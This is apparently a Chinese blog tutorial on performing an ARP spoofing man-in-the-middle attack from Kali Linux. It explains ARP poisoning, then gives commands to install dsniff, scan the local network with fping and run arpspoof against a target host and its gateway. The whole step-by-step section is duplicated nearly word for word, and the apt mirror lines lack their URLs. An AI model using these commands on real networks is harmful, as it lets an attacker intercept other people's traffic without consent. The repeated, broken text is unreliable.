kali linux实现arp攻击对方主机
通过Kali实现ARP攻击
攻击原理:当主机A发出广播询问:我是192.168.43.2,硬件地址macA,我想知道主机IP是192.168.43.3的硬件地址。此时主机B回应:我是192.168.43.3,硬件地址是macB。如果此时IP地址是192.168.43.4的主机C非法回应:我是IP192.168.43.3,我的硬件地址是macC。这样主机A就会收到两个ARP回应包,由于ARP遵循后到优先规则,所以如果主机C持续不停发出ARP欺骗包,就一定能够覆盖掉正常的ARP回应包(也称为ARP毒化)。然后主机A就会误信192.168.43.3的硬件地址是macC。这样当主机A向主机B发送数据时,主机C就劫持了主机A发送给主机B的数据,这就是ARP欺骗的过程。相反,如果主机B向主机A发送数据,主机C依然可以以同样的ARP欺骗方式,劫持主机B发送给主机A的数据,这样就形成了"中间人攻击"。还有一种ARP欺骗的方法是:主机C直接冒充网关,此时主机C会不停地发送ARP欺骗广播,声称自己是192.168.43.1,硬件地址是macC。这样局域网内所有主机都会被欺骗,更改自己的缓存表,主机C将会监听到整个局域网发送给互联网的数据报。
首先,安装好Kali Linux:
- 进入Kali的官网下载Kali的安装包。
- 使用虚拟机打开镜像文件。
- 等待开机后输入密码"kali"和账号"kali"。
- 打开的界面如下,选择第一个。
步骤:
- 打开
/etc/apt/sources.list
文件,命令:nano /etc/apt/sources.list
。 - 在官方软件源地址前加上
#
号,以注释掉Kali Linux官方软件源。 - 目前所知国内的Kali Linux镜像站有:
- 中国科学技术大学开源镜像站:
deb kali/updates main contrib non-free deb kali main non-free contrib deb-src kali main non-free contrib
- 东软信息学院开源镜像站:
deb kali/updates main contrib non-free deb kali main non-free contrib deb-src kali main non-free contrib
- 阿里云开源镜像站:
deb kali/updates main contrib non-free deb kali main non-free contrib deb-src kali main non-free contrib
将以上任一镜像站的地址添加到/etc/apt/sources.list
文件中,然后保存。
- 执行命令
apt-get update
更新软件源。也可以自行搜索其他镜像站。 - 安装dsniff数据包(arpspoof是dsniff的一个附属工具,因此我们需要安装dsniff),安装命令如下:
apt-get install dsniff
如果遇到部分数据包安装错误的情况,可以参考相关博文:Kali Linux 2020中使用arpspoof。
- 如果已经安装了dsniff数据包,就可以开始ARP欺骗了。首先,通过以下命令确定网卡名称和IP地址:
ifconfig
- 然后嗅探所在WLAN下所有设备的IP地址,命令如下:
fping -g 本机IP地址/24
例如,如果本机IP是192.168.0.101,命令就是fping -g 192.168.0.101/24
。
- 选择攻击目标,以我的手机IP地址192.168.0.100为例。
- 输入以下命令:
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
其中,网卡名称可以在前面提到的命令ifconfig
的输出中找到。假设我的网卡名称是eth0,攻击目标是我的手机,IP是192.168.0.100,手机的网关是192.168.0.1(将IP的最后一位改为1),那么我的攻击命令就是:
arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
打开镜像文件
- 等待开机后输入密码"kali"和账号"kali"。
- 打开的界面如下,选择第一个。
步骤:
- 打开
/etc/apt/sources.list
文件,命令:nano /etc/apt/sources.list
。 - 在官方软件源地址前加上
#
号,以注释掉Kali Linux官方软件源。 - 目前所知国内的Kali Linux镜像站有:
- 中国科学技术大学开源镜像站:
deb kali/updates main contrib non-free deb kali main non-free contrib deb-src kali main non-free contrib
- 东软信息学院开源镜像站:
deb kali/updates main contrib non-free deb kali main non-free contrib deb-src kali main non-free contrib
- 阿里云开源镜像站:
deb kali/updates main contrib non-free deb kali main non-free contrib deb-src kali main non-free contrib
将以上任一镜像站的地址添加到/etc/apt/sources.list
文件中,然后保存。
- 执行命令
apt-get update
更新软件源。也可以自行搜索其他镜像站。 - 安装dsniff数据包(arpspoof是dsniff的一个附属工具,因此我们需要安装dsniff),安装命令如下:
apt-get install dsniff
如果遇到部分数据包安装错误的情况,可以参考相关博文:Kali Linux 2020中使用arpspoof。
- 如果已经安装了dsniff数据包,就可以开始ARP欺骗了。首先,通过以下命令确定网卡名称和IP地址:
ifconfig
- 然后嗅探所在WLAN下所有设备的IP地址,命令如下:
fping -g 本机IP地址/24
例如,如果本机IP是192.168.0.101,命令就是fping -g 192.168.0.101/24
。
- 选择攻击目标,以我的手机IP地址192.168.0.100为例。
- 输入以下命令:
arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址
其中,网卡名称可以在前面提到的命令ifconfig
的输出中找到。假设我的网卡名称是eth0,攻击目标是我的手机,IP是192.168.0.100,手机的网关是192.168.0.1(将IP的最后一位改为1),那么我的攻击命令就是:
arpspoof -i eth0 -t 192.168.0.100 192.168.0.1